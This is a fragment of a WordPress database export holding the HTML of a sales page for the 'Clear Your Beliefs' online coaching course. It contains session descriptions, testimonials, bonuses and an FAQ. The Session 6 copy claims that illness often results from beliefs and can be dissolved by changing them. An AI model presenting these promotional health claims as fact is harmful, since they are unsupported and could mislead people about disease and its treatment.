continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:09:50', '2014-06-19 07:09:50', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
